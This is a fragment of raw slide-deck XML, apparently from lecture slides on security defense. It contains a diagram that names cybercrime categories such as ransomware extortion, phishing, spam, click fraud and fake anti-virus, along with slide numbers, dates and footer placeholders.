          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650" y="4386363"/>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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770" y="4517577"/>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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158" y="3165708"/>
          <a:ext cx="1243079" cy="7893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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278" y="3296921"/>
          <a:ext cx="1243079" cy="78935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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="74311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8042AE-A999-48C8-9C41-0EB84E665592}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603288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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399134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FBF96E-C445-4FF1-86A3-96F5585B6DBD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Header Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Christo Wilson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="511919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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212001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92AC4-46E6-48DF-9C15-A91B135037C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493818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92AC4-46E6-48DF-9C15-A91B135037C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3391547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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1437862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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2792287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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690097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743B9-CA01-443A-AB34-196053FB76B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2227758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92AC4-46E6-48DF-9C15-A91B135037C5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998397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04A464-A1E0-49F7-8DD1-80F7BCF5362F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="433507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FBF96E-C445-4FF1-86A3-96F5585B6DBD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>8/22/2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Header Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Christo Wilson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1679265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4183-7561-4EC9-81D4-1D28E38AAD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B10340-E29D-477F-85BE-ADE380686D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C76B81-3935-4EEB-A508-65D44CB9FD1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A9F718-9D58-44B0-9AF4-EEC17D92E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CCB966-F59F-4399-97A1-D4AA94F4F671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2086686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3FC2-61C9-434B-99EF-77F82BABD0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97E03E-9F8B-4311-B4DF-D7DC9722AF4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9C325-E8DE-4B83-888E-23F08436DDB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C532A71-FD06-429A-81A4-2964A4EAF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62EA5-085E-4E47-AA71-0C7C3FD38B35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="532787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CBAF28-F3C4-4CFC-A7B1-64E391DA1F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6A21F8-5C83-422C-938C-A876CE198BD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8C729-CDBA-4757-94D5-92EBF12CD73E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FD07B3-620F-44DB-BB6E-F2748B49D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717CB-363C-4DD0-A30C-DE47B3D26C9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="760685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1A14D-DD1C-4951-9DD2-8A4781701B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66FC23-E4E3-42C5-AEFF-F4F0867A69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48676-A43B-41E2-B239-EBEF7753100E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F73A9D3-AB52-46E0-B259-F20B4731C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19990-E026-4CA5-9CB2-22277BE16EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1445325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73B5-495E-4196-9FE3-DE748FD31C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94B9FD-D260-4C96-BA0D-26C8E9CE28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0264AE4-FF36-41F4-B417-5CAE19FC95F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E87595B5-D7DA-4726-841B-B3E0A7A5E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22823-D5DA-4B84-A1F1-EE651CF2036B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3763918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81102-8603-4125-A1E5-8762024D02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E9E8B0-6AB0-4638-B5DD-2E764A81653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2CFC08-1994-4879-A7D7-0173BFEA95A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D661D0-CDCA-46FE-A176-55948FBCACE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{195C84FF-55FD-47B7-B913-2DEFEDB1E2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5E2FB6-F8C9-42C9-8812-62147AEF7BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83899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7C001-CDB5-4E7D-8892-FA6820EADC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72AC75-FB88-40EC-8A1B-2D151FD7BB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D11DC53-3DC0-46AE-9D95-F4210982074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4BD170-C6F4-4236-8BA2-B4D52FC87F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20C008-12EB-4405-A2A0-66DD3FF2586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21B306-FE18-4193-8A5F-C251450D7F8F}"/>
